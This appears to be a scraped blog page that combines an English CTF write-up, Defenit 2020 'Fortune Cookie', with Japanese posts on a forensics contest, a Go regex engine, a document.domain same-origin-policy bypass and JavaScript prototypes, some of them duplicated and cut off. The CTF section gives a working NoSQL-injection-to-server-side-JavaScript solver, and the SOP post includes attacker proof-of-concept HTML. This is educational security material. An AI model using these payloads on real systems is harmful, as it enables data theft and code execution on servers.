        res.send('Please Input your <a href="?favoriteNumber=1337">favorite number</a> 😊');
    } else {

        const client = new MongoClient(MONGO_URL, { useNewUrlParser: true });

        client.connect(function (err) {

            if (err) throw err;

            const db = client.db('fortuneCookie');
            const collection = db.collection('posts');

            collection.findOne({ $where: `Math.floor(Math.random() * 0xdeaaaadbeef) === ${favoriteNumber}` })
                .then(result => {
                    if (favoriteNumber > 0x1337 && result) res.end(FLAG);
                    else res.end('Number not matches. Next chance, please!')
                });

            client.close();

        });
    }
})

app.listen(8080, '0.0.0.0');
```

Below is an overview of the features in the app.
See the source code for details.

- `GET /`: Top page
  - Authenticated users → list of features
  - Not authenticated users → link to /login
- `GET /login`: Login page
- `POST /login`: Do login
  - Set a signed cookie `user`
- `GET /logout`: Do logout
  - Discard the set cookie
- `POST /write`: Post some text
- `GET /view`: List posted text
  - You can see all ObjectIds of the documents posted by yourself.
- `GET /posts`: Browse contents of the documents
  - You can see the contents of your post by specifying the ObjectId.
  - Can't see other user's.
- `GET /flag`: Lottery
  - Lucky man will get the flag.
  - Details will be described later

### What is the final goal?

First of all, start to analyze the app to find out what I should do.
There is an endpoint `/flag`, so let's start from here.

```javascript
app.get('/flag', (req, res) => {

    let { favoriteNumber } = req.query;
    favoriteNumber = ~~favoriteNumber;

    if (!favoriteNumber) {
        res.send('Please Input your <a href="?favoriteNumber=1337">favorite number</a> 😊');
    } else {

        const client = new MongoClient(MONGO_URL, { useNewUrlParser: true });

        client.connect(function (err) {

            if (err) throw err;

            const db = client.db('fortuneCookie');
            const collection = db.collection('posts');

            collection.findOne({ $where: `Math.floor(Math.random() * 0xdeaaaadbeef) === ${favoriteNumber}` })
                .then(result => {
                    if (favoriteNumber > 0x1337 && result) res.end(FLAG);   // ★
                    else res.end('Number not matches. Next chance, please!')
                });

            client.close();

        });
    }
})
```

If you get to the line in the code marked with ★, you can read the Flag.
Also, if you read the code purely, you will find that you need to meet all the following conditions to actually get there.

- GET parameter `favoriteNumber` meets `!~~favoriteNumber == True`.
  - [What is `~~`](https://stackoverflow.com/questions/5971645/what-is-the-double-tilde-operator-in-javascript)
  - Because of this condition, some strings are ineligible as the value of `favoriteNumber`.
- Specify GET parameter `favoriteNumber` that makes ``` `Math.floor(Math.random() * 0xdeaaaadbeef) === ${favoriteNumber}` ``` passed as the condition of `collection.findOne()` be True.
- GET parameter `favoriteNumber` meets  `(Math.floor(Math.random() * 0xdeaaaadbeef) === ${favoriteNumber}) == True`を満たす
  - `Math.floor(Math.random() * 0xdeaaaadbeef` is the condition passed to `collection.findOne()` as argument.
- GET parameter `favoriteNumber` is greater than 0x1337.
- There is at least one document in the `posts` collection.

In practice, the value of `Math.floor(Math.random() * 0xdeaaaadbeef)` will be huge, so unless you are a extremely lucky person, it's not a good idea to challenge the lottery.
For the time being, I set the final goal to break this condition by some other approach.

### Consider likely approaches

Now, let's consider a approach to pass the lottery.

First, I considered the vulnerabilities likely to use.
The app uses MongoDB, so I suspected NoSQL Injection.
Also, even if you look at the configuration file, it seems that you can chain to SSJI from NoSQL injection.
If you can do SSJI and rewrite the contents of `Math.floor()` into a function that returns a fixed value, you can easily pass the test.

### Find NoSQL Injection

Okay, let's find NoSQL Injection.

Found it.

```javascript
app.post('/login', (req, res) => {
    let { username } = req.body; // ①

    res.cookie('user', username, { signed: true });
    res.redirect('/');
});

︙

app.get('/posts', (req, res) => {

    let client = new MongoClient(MONGO_URL, { useNewUrlParser: true });
    let author = req.signedCookies.user; // ②

    if (typeof author === 'string') {
        author = { author }; // ③
    }

    client.connect(function (err) {

        if (err) throw err;

        const db = client.db('fortuneCookie');
        const collection = db.collection('posts');

        collection
            .find(author) // ④
            .toArray()
            .then((posts) => {
                res.render('posts', { posts })
            }
            );

        client.close();

    });

});
```

#### Explanation

The basic request for `POST /login` looks like this:

```http
POST /login HTTP/1.1
Host: fortune-cookie.ctf.defenit.kr
Content-Length: 16
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
Origin: http://fortune-cookie.ctf.defenit.kr
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://fortune-cookie.ctf.defenit.kr
Accept-Encoding: gzip, deflate
Accept-Language: ja,en-US;q=0.9,en;q=0.8,zh-CN;q=0.7,zh;q=0.6
Connection: close

username=8ayac
```

When you send it, the value of `req.body` becomes `{ username: '8ayac' }` (in the line with the comment ①) and the value `8ayac` corresponding to this object `username` key will be set as the variable `username`.
And the signed cookie `user` holds the value `8ayac`.
This cookie will be set in the response and the authenticated users will use it from then on.

Below is the actual response.

```http
HTTP/1.1 302 Found
Server: nginx/1.14.0 (Ubuntu)
Date: Sun, 07 Jun 2020 01:01:54 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 46
Connection: close
X-Powered-By: Express
Set-Cookie: user=s%3A8ayac.u%2B5zh6Yd%2Fw28iIedhUa9yRii9zcX4thK7%2FANBXHDhXs; Path=/
Location: /
Vary: Accept

<p>Found. Redirecting to <a href="/">/</a></p>
```

Within `POST /posts`, the set cookies are normally used in the following order.

1. It is assigned to the variable `author` (in the line marked with ②)
2. Converted to an object (in the line marked with ③)
3. Used as a query selector for `find()` (in the line marked with ④)

For example, suppose the cookie value is `8ayac`.
This value is converted to an object called `{"author": "8ayac"}` in ③, and finally a query is issued so that the document whose `author` is `8ayac` is retrieved.

There is a vulnerability here.
If the object is set in the cookie, you can freely manipulate the conditions passed to the find query.

For example, suppose the cookie value is `{content:{'$regex':'.*'}}`.
This object will be used in ④ directly after being assigned to the variable `author` in ②.
As a result, a query will be issued that retrieves documents whose `content` matches the regular expression `.*`.

If you want to set a value like that into a cookie in practice, send a request like bellow:
With an appropriately customized payload, you can set any object to a cookie value.

```http
POST /login HTTP/1.1
Host: fortune-cookie.ctf.defenit.kr
Content-Length: 14
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
Origin: http://fortune-cookie.ctf.defenit.kr
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://fortune-cookie.ctf.defenit.kr/login
Accept-Encoding: gzip, deflate
Accept-Language: ja,en-US;q=0.9,en;q=0.8,zh-CN;q=0.7,zh;q=0.6
Connection: close

username[content][$regex]=.*
```

### Upgrade to SSJI

MongoDB has some features that perform server-side execution of JavaScript code.
The `$where` operator is one of them.
For more information, please see <https://docs.mongodb.com/manual/core/server-side-javascript/>.

> $where operator that evaluates a JavaScript expression or a function in order to query for documents.

Below you can see that the `eval` function in the `$where` condition has been actually performed.

```shell-session
root@5895c47e40e5:/# mongo -u redacted -p redacted
MongoDB shell version v4.2.7
(snip)
> use fortuneCookie
switched to db fortuneCookie
> db.posts.find({ $where: "eval(1+1) == 1" })
> db.posts.find({ $where: "eval(1+1) == 2" })
{ "_id" : ObjectId("5edc178c9ee53600459bd3b0"), "author" : "8ayac", "content" : "hoge" }
{ "_id" : ObjectId("5edc373b9ee53600459bd3b1"), "author" : "8ayac", "content" : "fuga" }
```

At last, let's make payload to rewrite `Math.floor` function well.

### Solver

I wrote a solver like below:

```python
#!/usr/bin/env python3
import requests


"""
Constants
"""
URL = 'http://fortune-cookie.ctf.defenit.kr'
N = 588488491  # Large enough to prevent accidents in a shared environment


"""
Exploit
"""
s = requests.Session()

payload = f"Math.floor = this.constructor.constructor('return {N}'); return 0"
s.post(f'{URL}/login', data={"username[$where]": payload})
s.get(f'{URL}/posts')

flag = s.get(f'{URL}/flag', params={'favoriteNumber': N}).text
print(f'{flag=}')
```

Executed it, then I got the flag.
Yay!

```shell-session
$ python3 solver.py
flag='Defenit{c0n9r47ula7i0n5_0n_y0u2_9o0d_f02tun3_haHa}'
```

### Flag

`Defenit{c0n9r47ula7i0n5_0n_y0u2_9o0d_f02tun3_haHa}`

## Thoughts(?)

I really enjoyed the challenges!
Thank you Defenit CTF.

## Inquiry

If you have any questions or suggestions regarding this article, please contact [8ayac](https://twitter.com/8ayac).
In addition, since I am studying English, I would be happy if you could tell me about my strange English expressions.

Thanks!


Hi, I'm 8ayac🐝 This post is a writeup of the 2 challenges I solved in 2020 Defenit CTF.
The challenges I solved are "Fortune Cookies" and "BabyJS" in Web category.

In addition, the result was a total of 1053pts and was 55th out of 964 teams.

The result of IPFactory

日本語版はこちら

\[Web 248pts] BabyJS…

2020 Defenit CTF Writeup ([Web]BabyJS, Fortune Cookie)

こんにちは、8ayacです🐝
今回は、2020 Defenit CTFで解いた2問のWriteupを書きました。
解いた問題はFortune CookieとBabyJSで、どちらもWebです。

ちなみに結果は、合計得点1053ptsで、964チーム中55位でした。

IPFactoryの結果

The English version is here

\[Web 248pts] BabyJS (47/964 Solves)

問題文



問題アプリの概要

添付ファイルを解凍してみると、アプリのソースコードやdockerの設定ファイルやらが出てきました。
どうやらExpressを使って書…

GoでシンプルなDFA型正規表現エンジンを実装した

🎄本記事はIPFactory Advent Calendar 2019 - Qiita16日目の記事です🎄

こんにちは、8ayacです。
最近、正規表現エンジンをGoで実装したので、その話を書きました。

正規表現エンジンとは

正規表現エンジンとは、正規表現のマッチングを行う処理系のことです。
正規表現エンジンは、DFA型とVM型という2つのタイプに分けられます。
各エンジンの特徴は、およそ以下の通りです。

DFA型

正規表現を、DFA(決定性有限オートマトン)に変換して、マッチングを行う。

VM型

正規表現を、バイトコードに変換して、マッチングを行う。

今回は、どちらのエン…

MBSD Cybersecurity Challenges 2018で優勝した【2連覇】

![公式ロゴ](img/win-the-1st-in-mbsd-cybersecurity-challenges-2018/mbsd_cybersecurity_challenges_2018_logo.png)

こんにちは、[8ayac](https://twitter.com/8ayac)です。先日、[MBSD Cybersecurity Challenges 2018](http://setten.sgec.or.jp/cooperation/060.html)というコンテストで優勝しました。[去年](https://twitter.com/8ayac/status/940922733088555008)に続き2年連続の優勝です。

この記事では、前述のコンテストの予選から最終審査会までの色々を書きたいと思います。

## コンテストについて

コンテストの概要は、[こちら](http://setten.sgec.or.jp/cooperation/060.html)のページに全て載っているので、必要に応じて参照して下さい。この記事では、競技内容に焦点を当てた紹介をしておこうと思います。

### テーマ

テーマは、「フォレンジック調査」でした。コンテストの設定は、公式に書かれている通りです。(以下参照)
> ある会社で開発したSNSのシステムにセキュリティ上の問題があると指摘されていたにも関わらずそのまま運用を続けていたところ、何者かに攻撃されてしまったようです。
> あなたのチームは、攻撃の全貌を解明できるでしょうか。

### 競技内容

このコンテストには、一次審査と最終審査があります。一次審査では、攻撃を受けたWebサイトのシステムと改ざんされる前のWebアプリケーションのソースコードを元に、「どのような攻撃を受けたか」「影響範囲はどのくらいか」を調査し、そのレポートを提出します。レポートを提出する相手には、攻撃を受けたWebサイトを運営する企業を想定するみたいでした。そして、一次審査で優秀なレポートを提出した上位10チームが最終審査会に進み、一次審査で提出したレポートに関する内容でプレゼンを行います。そのプレゼンと、一次審査のレポートに対する審査の総合点で最終的な順位が決定されます。

### 大会期間

大会期間は、以下の表の通りです。

| 内容                  | 期間                              |
| --------------------- | --------------------------------- |
| チームエントリー受付  | 2018年10月10日(水)～11月20日(火)  |
| 課題配布              | 2018年10月22日(月)～11月20日(火)  |
| レポート提出期限      | 2018年11月20日(火)                |
| 一次審査結果発表      | 2018年11月27日(火)                |
| 最終審査会            | 2018年12月12日(水)                |

課題配布期間内であれば、チームエントリーが済んだチームから課題が配布されます。課題の配布が始まる前にチームエントリーを済ませておけば、一次審査のレポート作成には最大で約一ヶ月ほどを充てることができます。最終審査会は一次審査の結果発表から約二週間後に行われます。

### 審査観点

審査観点については、公式のものを引用します。
以下のような審査観点に基づいて、レポートやプレゼンが採点されるようでした。

> #### 攻撃に使われた脆弱性
>
> どのような脆弱性を使って、どのような手順で攻撃を行ったのかがわからないと、サイト復旧後もまた同じ被害を受けます。(攻撃に使われなかった脆弱性は様々ありますが）まず何から対策に着手すれば良いのかの判断にも重要な情報です。
>
> #### 被害の範囲
>
> どのようなデータがどのくらい、漏えいや破壊がされたのかわからないと、事業に与えるインパクトが判断できません。またもしサイト利用者のデータに被害が及んでいる場合は、利用者に対して謝罪をする必要があるかもしれません。
>
> #### 対応方法
>
> 被害を受けた会社は今パニックになっているでしょう。直近で行うべき暫定対策や、長期的に取り組む恒久対策など、対応方法を提案してください。
>
> #### 調査で行った工夫
>
> ツールを使った・作った、チームメンバーの役割分担、調査手法など、解析を網羅的・効率的に実施するために行った工夫があれば、ツール名やソースなど具体的に記載しアピールしてください。

## 予選(一次審査)に関すること

### 気合

何事も「気合」が大事だというのが、文化系に見えてゴリゴリの体育会系である私達のサークルの教えです。2連覇を狙っていました。我々のチームは、部室で「優勝する人！」と言って手を挙げた人達同士で組んだチームです。同じ学校から出たMOFFU_MOFFU_ISCにも挙手していた人はいましたが、私達のチームは全員が「優勝する」と宣言したチームだということもあり、負けるわけにはいきませんでした。大会期間中、各チームの気合で満ちた部室は殺伐としていました。

### 調査の進め方

調査は、基本的には、各々の技術や知識に依った調査をバラバラに進めていき、それをスプレッドシートにまとめていくという進め方をしていました。そして、そのスプレッドシートを基にチームで疑問点などを解消していくことで、攻撃の全貌を明らかにしていきました。調査期間には一次審査で使える時間の約三分の二を費やし、残りの時間でスプレッドシートの内容を基にレポートを作成しました。

役割分担は、概ね以下の通りです。各人が以下に書かれている作業以外もしていますが、ここでは「主に担当した作業」についてまとめています。

- [@8ayac](https://twitter.com/8ayac)
  - チームリーダー
  - 攻撃者的な視点での作業全般
  - 攻撃の検証方法作成
  - 不足している証跡等の洗い出し
  - 自然言語担当(レポート作成)
- [@iria_piyo](https://twitter.com/iria_piyo)
  - フォレンジックのプロ
  - ファイル系の調査
  - タイムスタンプの紐づけ
- [@mnao_305](https://twitter.com/mnao_305)
  - 対策は俺に任せろ
  - 一般的な調査作業
- [@somebody_gp](https://twitter.com/somebody_gp)
  - ツールを使ったマルウェアの検出
  - ツールを使ったログ解析
  - 被害範囲の列挙

私達のチームは、Blue寄りの人間が多かったので、私は攻撃者的な観点から調査を支援していました。自己評価ですが、各々の知識や技術に依った調査が行き詰まってきた終盤で、かなり威力を発揮できたと思います。終盤では、その時点で出揃っている証跡を一つ一つ吟味して、攻撃の成功の可否や再現を行い、「こんな証跡があったら嬉しい」という情報を他のBlueなメンバーに渡して調査してもらいました。そして、その調査結果をまた吟味して、以降ループといった感じに調査を進めました。初めからこの手法で調査を進められていれば、もう少し余裕を持ってレポートの作成に移れたと思います。

### 正確性と詳細さ

個人的に、大会の公式ページに書かれていた「あなたのチームは、攻撃の全貌を解明できるでしょうか。」という一文に対して闘争心を強く持っていました。チームとしても、その思いは強く、全員が「必ず攻撃の全貌を明らかにする」という闘争心をメラメラと燃やしていたと思います。

攻撃の全貌を解明したことを示すために、レポートの内容は詳細に書くように心がけました。具体的には、以下の情報を載せるようにしました。

- 確認した事象
- 事象の発生日時
- 確認した事象の検証方法(再現方法)
- 裏付けとなる証跡

正確性にもこだわりました。その理由は「フォレンジックだから」と言ってしまえばそれまでなのですが、個人的な理由としては、去年の大会で「誤検知が多い」という酷評を受けていたからです。今年は、非の打ち所がないような報告書を提出しようと心に決めていました。他にも、正確性の観点でいえば、言葉の表現が厳密になるように気をつけました。例えば、確認できた事象が「明らかなこと」か「推測されることか」を適当に区別していました。

実際のレポートの雰囲気はこんな感じです。

![実際のレポートを一部抜粋した画像](img/win-the-1st-in-mbsd-cybersecurity-challenges-2018/actual_report_screenshot.png)

### OSINT(?)

最終審査会で審査員の方がお話していたことによれば、今回の一次審査の課題として配布されたシステムは、二年前に開催された[MBSD Cybersecurity Challenges 2016](http://setten.sgec.or.jp/cooperation/037.html)のシステムとほぼ同じものでした。そのことは、過去の大会の情報は収集していたので「もしかしたら、これ同じかも...?」ぐらいの見当は付けていましたが、我々のチームのメンバーに2年前の大会に参加していた人が誰もいなかったので、確信は持てていないような状態でした。

過去の課題と同じシステムであれば、インターネットに落ちている過去の大会の情報が調査の役に立つかもしれないと考え、実際にはMBSD Blogの[過去記事](https://www.mbsd.jp/blog/20161222.html)などを参考にしました。とはいえ、実際に参考にした時点では、今回の大会でもDirty COWやSQLiなどの脆弱性が使われていたことは知っており、ほとんどの内容は既知のものでした。この記事を読んで気づいたことといえば、Heart Bleedの脆弱性が今回の調査対象のシステムにも残っていたことぐらいです。しかし、実際に攻撃されたと思われる証跡は確認できず、実際のレポートでは、考察の章の中で以下のように少し触れる程度にしておきました。

> 今回の解析ではHeartbleedの脆弱性を悪用した攻撃の証跡を確認することができなかったがHeartbleedを悪用した攻撃ではそもそも証跡が残らないため、実際にはこの脆弱性を悪用した攻撃が行われていた可能性がないとは言い切れない。[^1]

### 工夫点

我々は対象のVMの調査を行う上で、FTK Imagerというツールを利用していました。これを利用すると、様々な恩恵があります。デジタルフォレンジックでは定番のこのツールですが、実際に使ったチームはとても少なかったらしく、「アピールしていれば、もう少し点数高かったのかな。」という講評をいただき、とても悔しい思いをしました。このツールを使ったことがアピールできる「工夫」だという認識はなかったので、その話を聞いたときにはとても意外でした。

私達のチームは、当初はApacheLogViewerやSplunkなどを用いて調査を行っていましたが、途中からはgrep、awk、sort、cut、sedなどのUNIXコマンドを用いて愚直に調査を行っていました。課題のログの分量と提出までの期間を考えても、十分だったと思っています。もっと大量のログであれば、ログ解析ツールなどを使って本格的に調査を進めた方が良かったかもしれません。同じ学校から出ていた別のチームのMOFFU_MOFFU_ISCは、ELK Stackを用いた解析を行っていて、かっこいいなと思いました。([MOFFU_MOFFU_ISCの記事](https://azara.hatenablog.com/entry/2018/12/14/110104))

## 本戦(最終審査会)に関すること

### 発表内容に関する考察

最終審査会での発表内容には毎年悩まされます。
最終審査会の審査観点も前述の四点だとすると、全てを盛り込んで十二分で喋るというのが難しいなと感じます。
他のチームはうまくやっていて、特に「NEthernet Ⅱ」さん(東北電子専門学校のチーム)の発表が上手に作られているなと感じました。
そのチームの発表では、最終的に今後の対応を提案する対象である経営層に合わせて、技術的な発表を避けて図や表を多く使用して事実(実際に攻撃に使われた脆弱性/被害範囲)に関する説明を端的に終えていました。
そして、残った時間で本題である対応方法の提案をしっかりと伝えており、その内容も説得力があって関心しました。
対応方法に関する質問にも、落ち着いて、説得力のある回答をされていたのが印象的です。
「NEthernet Ⅱ」さんの発表の点数は「表示エラー」さんのチームと同点で一番高かったのですが、発表内容には「調査で行った工夫」に関することは含まれていなかったので、必ずしも審査観点の全てを、発表内容に盛り込む必要はないのかもしれません。

### IPFactoryの発表内容

私達のチームの発表のテーマは、「正確な原因究明には多くの証拠が不可欠」というものでした。大筋は、「ログやその他の証拠が十分に取れていないと、誤検知や見逃しが発生する可能性があります。
さらには、それに気づかない可能性もあるので、ログやその他の証拠は普段から十分に集めておくことが重要です。
今後は証拠収集のポリシーやルールの策定を検討する必要があると思いますが、いかがでしょうか。」といった内容です。

結果としては、コケたなという印象です。事実、発表の点数は下から二番目でした。色々反省があるのですが、全体的に説得力のない発表内容になってしまったなという感想です。

### 発表スライド

実際の発表スライドは[こちら](https://speakerdeck.com/8ayac/mbsd-cybersecurity-challenges-2018-zui-zhong-shen-cha-hui-fa-biao-suraido)

## 大会を振り返って

まず、何よりも、やはり優勝できて嬉しい。去年も優勝したが、当時は先輩に頼りきりだったので、今年は自分たちの力で優勝を勝ち取れたことが何よりも嬉しい。
また、去年は「誤検知が多い」と酷評を受け、とても悔しかったが、今年は「一番精度が高かった」と好評をもらえて嬉しい。
しかし、「ほぼ真相を解明できていた」という好評を受けた一方で、一点の間違いがあったことが悔しい。
なぜ、その点を見落としたのか、その原因をよく考察して次回以降に繋げたいと思う。

次に、DFIRをテーマにした今回のコンテストに取り組んでみて変化した自身の心境についてだが、このコンテストを通じてBlueな観点からの情報セキュリティにも非常に興味を惹かれた。
攻撃者の悪意を持った行動を辿る楽しさには、こういう機会でもなければ気づかなかっただろうと思う。
攻撃者の行動を辿る中で、徐々に真実が解明されていくパズルを解いているような感覚がとても気持ち良かった。
また、今回のチームでは攻撃者的な視点の私と他の防御側視点のチームメンバーの間で、お互いに気づかないことを共有できたことで、情報セキュリティをやっていく上でRedとBlueの視点のどちらも必要であることを肌で感じる事ができたのは良い経験だと思う。
これからは、極端にRedに寄らず、Blue的な観点も持つことが重要だと感じた。

最後に、今回の優勝は、チームで勝ち取ったものだと思う。
誰か一人でも欠けていれば、優勝はできていなかっただろうと心から思う。チームメンバーに謝辞を述べたいところではあるが、最近Twitterで、謝辞はビッグバンに対して述べると良いらしいということを知った。
ということで、ありがとうビッグバン。

## おまけ

<blockquote className="twitter-tweet">
    <p lang="ja" dir="ltr">
        MBSD Cybersecurity Challenges 2018で優勝しました。2連覇です！😎😎 <a href="https://t.co/bWSVAkIhLc">pic.twitter.com/bWSVAkIhLc</a>
    </p>
    &mdash; 8ayac(Yoshinori Hayashi) (@8ayac) <a href="https://twitter.com/8ayac/status/1072787615525392384?ref_src=twsrc%5Etfw">December 12, 2018</a>
</blockquote>

## 実際に提出したレポート(2019/01/14 追記)

私達のチーム(IPFactory)が提出した[レポート](https://drive.google.com/file/d/1TqSTRwXYYWOqvguZ-Y2CxOxAb3iy_Slx/view)を公開しました。
今回の大会の成果物は、共有することに大きな意義があると考えました。
私達の公開したレポートが、今回の大会に参加していた学生の方々や、その他の様々な方のお役に立てれば幸甚の至りです。

<iframe src="https://drive.google.com/file/d/1TqSTRwXYYWOqvguZ-Y2CxOxAb3iy_Slx/preview" width="450" height="625"></iframe>

## 注釈

[^1]: 実際のレポートより抜粋: 考察の章の中でHeart Bleedを悪用した攻撃の可能性について触れている部分


公式ロゴ

こんにちは、8ayacです。先日、MBSD Cybersecurity Challenges 2018というコンテストで優勝しました。去年に続き2年連続の優勝です。

この記事では、前述のコンテストの予選から最終審査会までの色々を書きたいと思います。

コンテストについて

コンテストの概要は、こちらのページに全て載っているので、必要に応じて参照して下さい。この記事では、競技内容に焦点を当てた紹介をしておこうと思います。

テーマ

テーマは、「フォレンジック調査」でした。コンテストの設定は、公式に書かれている通りです。(以下参照)

ある会社で開発したSNSのシステムにセキュリテ…

document.domainに起因するSame-Origin Policyのバイパス

## はじめに

`document.domain`に関わる面白いSOPバイパスの手法を検証した。

## 概要

`document.domain`は古くからSOPを緩和するために使われてきたようだ。
例えば、同じ親ドメインを持つ2つのオリジン(例: `foo.exapmle.com`と`bar.example.com`)があり、SOPに縛られることなく互いに通信を行いたいとする。このとき、双方で`document.domain`の値に`example.com`を設定することで、2つのドメインは互いのDOMにアクセスすることができるようになる。
今回検証したバイパス手法は、この挙動を利用したものである。

## 条件

以下の条件を満たしているとき、SOPをバイパスできる。

1. 対象のページのdocument.domainが上位ドメインに設定されている
2. 問題のあるページのサブドメインのコンテンツをクライアント側で制御できる

## 検証

まず、被害者のサイトに見立てて、以下のような`victim.example.com`というページを用意する。

```html

<meta charset="utf-8">
<script>
    console.log(document.domain);
    document.domain = "example.com";    // vuln
    console.log("document.domainの値は次のように設定されています。: " + document.domain);
    document.write("このテキストはvictim.example.comに書かれたものです。");
</script>
```

このコードでは、5行目で`document.domain = "example.com"`としている。
そのため、攻撃者の用意する以下のような`attacker.example.com`で同様に`document.domain = "example.com"`とすると、攻撃者のページからも`victim.example.com`のDOMへのアクセスが可能になる。
攻撃の成立にはサブドメインのコンテンツを制御できる必要があるが、一般的な例ではSubdomain Takeoverでそれが可能になる。

```html

<meta charset="utf-8">
<script>
    console.log(document.domain);
    document.domain = "example.com";
    console.log("document.domainの値を次のように設定します。: " + document.domain);
</script>
<iframe src="http://victim.example.com/" onload="alert(contentDocument.body.innerHTML)"></iframe>
```

実際に`attacker.example.com`にChromeでアクセスすると、`victim.example.com`のページの内容を`attacker.example.com`から取得できていることが確認できた。

![attacker.example.comにアクセスした際の画面](img/bypassing-the-same-origin-policy-via-document_domain/the_result_of_accessing_attacker_example_com.png)

## 脅威

検証では、`attacker.example.com`から`victim.example.com`の内容を読み出せた。
もし、FacebookやTwitterなどに同じ問題(バグ)があった場合には、ユーザのメッセージやその他の情報を読み出される可能性がある。
また、`document.domain`に最上位ドメインである`com`や`org`などが設定されている場合には、`victim.example.com`に対して、例えば`evil.com`からの攻撃が可能になる。なお、現在は`document.domain`に最上位ドメインを設定できる主要ブラウザはSafariのみで、その他の主要ブラウザではエラーになる。(詳細: [https://hackerone.com/reports/398163/])

## まとめ

上位ドメインを共有する2つのオリジンのdocument.domainに、共有している上位オリジンを設定すると双方のDOMにアクセスできるようになる。
これを利用して、問題のあるページのサブドメインのコンテンツをクライアント側で制御できるとき、SOPをバイパスしてそのページのコンテンツにアクセスすることが可能になる。また、サブドメインのコンテンツをクライアント側で制御できるようにする方法としてSubdomain Takeoverが挙げられるが、主要ブラウザの中でSafariのみは`document.domain`に`com`や`org`などの最上位ドメインを設定できるため、Subdomain Takeoverが不要なケースがある。

## 感想

このネタはTwitterで見かけたもので、検証が簡単だったので記事にしました。
(HackerOneで公開されたレポートは追うようにしているけど、今回の記事に関連するfiledescriptor氏の[レポート](https://hackerone.com/reports/398163)は見落としてしまっていたなあ...。)
書き終わってから思ったのですが、2つのオリジンで`document.domain`の値を変更して同一オリジンにしてるのを、SOPのバイパスと呼んで良いものか微妙ですね。

あと、Safariでは`document.domain`に最上位ドメインを設定できるってところ、実はMacを持っていないのでWindows版Safari(バージョン5.1.7)でしか検証できていません。
もし、最新版のMacで検証した人がいたら、結果を教えていただけたら幸いです。
Mac買いたいなあ...。

## 参考資料

- [Bypassing Same-Origin-Policy - document.domain](https://www.aa7ifs.com/bypassing-same-origin-policy-using-document-domain/)
- [https://hackerone.com/reports/398163](https://hackerone.com/reports/398163)
- [クロスドメイン制約 を document.domain の 変更 で 回避 - galife](https://garafu.blogspot.com/2013/09/documentdomain.html)

はじめに

document.domainに関わる面白いSOPバイパスの手法を検証した。

概要

document.domainは古くからSOPを緩和するために使われてきたようだ。
例えば、同じ親ドメインを持つ2つのオリジン(例: foo.exapmle.comとbar.example.com)があり、SOPに縛られることなく互いに通信を行いたいとする。このとき、双方でdocument.domainの値にexample.comを設定することで、2つのドメインは互いのDOMにアクセスすることができるようになる。
今回検証したバイパス手法は、この挙動を利用したものである。

条件

以下の条件を…

JavaScriptのPrototypeオブジェクトについて

> この記事は、[dharani jayakanthan](https://dev.to/danny)氏の[Intro To Prototype - JS](https://dev.to/danny/intro-to-prototype---js-35a)の翻訳記事です。

## Prototype

JavaScriptで関数を作ると、JavaScriptエンジンが2つのオブジェクトを作ります。

JSエンジンが関数を処理するときに作られる2つのオブジェクトは、

- その関数自体を呼び出す`Function`オブジェクト
- `Prototype`オブジェクト

## `prototype`とは

JSの`prototype`とは、主に継承のために利用され、関数の`prototype`プロパティにメソッドやプロパティを追加して、それらのメソッドとプロパティをその関数のインスタンスで利用できるようにします。

```js
function foo() {
    console.log("Hello!!");
}
// foo.prototype
```

JSエンジンが`prototype`オブジェクトを作ると、プロパティも同時に作られます。関数内のこの`prototype`プロパティを使用して、その関数用に作られた`prototype`オブジェクトにアクセスできます。

例えば、`prototype`オブジェクトを指す`prototype`という呼ばれるプロパティを持つ`foo`関数を見てきました。`prototype`オブジェクトを使用するには、`new`というキーワードを使用してオブジェクトを作成します。

```js
var myObj = new foo();
// myObj
```

`myObj`オブジェクトを作ると、JSエンジンはデフォルトで"`__proto__`"というオブジェクトを持つオブジェクトを作ります。これは、関数によって作られた最初の`prototype`オブジェクトを指します。

## `__proto__`を使ってみる

オブジェクトを生成すると、JSエンジンが`__proto__`オブジェクトを作ることがわかったので、それがどのように機能するかを見るために、`myObj`オブジェクト内に`Hi from myObj itself`という値を持つ`say`プロパティを作ってみましょう。

```js
function foo() {}
var myObj = new foo();
myObj.say = "Hi from myObj itself";
```

`myObj.say`にアクセスすると`"Hi from myObj itself"`という値が返されることがわかります。値の異なる同じ名前のプロパティを`__proto__`オブジェクトに作ります。

```js
function foo() {}
var myObj = new foo();
myObj.__proto__.say = "Hi from proto object";
```

> `myObj.__proto__.say`にアクセスすると、`"Hi from proto object"`が返されます。

```js
function foo(){}
var myObj = new foo();
myObj.say = "Hi from myObj itself";
// Hi from myObj itself
myObj.__proto__.say = "Hi from proto object";
// Hi from proto object
delete myObj.say;
// true
myObj.say
// Hi from proto object
```

しかし、`myObj.say`を削除してから、それにアクセスしたとき、JSエンジンは`say`というプロパティが存在するかを確認するために、`__proto__`オブジェクトを調べます。そして、`"Hi from proto object"`という値を持つプロパティ`myObj.__proto__.say`が発見され、その値が返されます。

> オブジェクトを作ると、JSエンジンは必ず`prototype`と呼ばれる別のオブジェクトを作ります。その`prototype`には、`.prototype`というキーワードを使用することでアクセスできます。しかし、`new`というキーワードを使ってオブジェクトを使ってオブジェクトを作った場合には、JSは`prototype`オブジェクトを指す`__proto__`を作ります。
>
> オブジェクト内のプロパティを探すと、JSエンジンがオブジェクト自体の中にそれを発見した場合、それが返されます。もし、そのようなプロパティが存在しない場合は、JSエンジンは`prototype`オブジェクトを調べます。


この記事は、dharani jayakanthan氏のIntro To Prototype - JSの翻訳記事です。

Prototype

JavaScriptで関数を作ると、JavaScriptエンジンが2つのオブジェクトを作ります。

JSエンジンが関数を処理するときに作られる2つのオブジェクトは、

その関数自体を呼び出すFunctionオブジェクト

Prototypeオブジェクト

prototypeとは

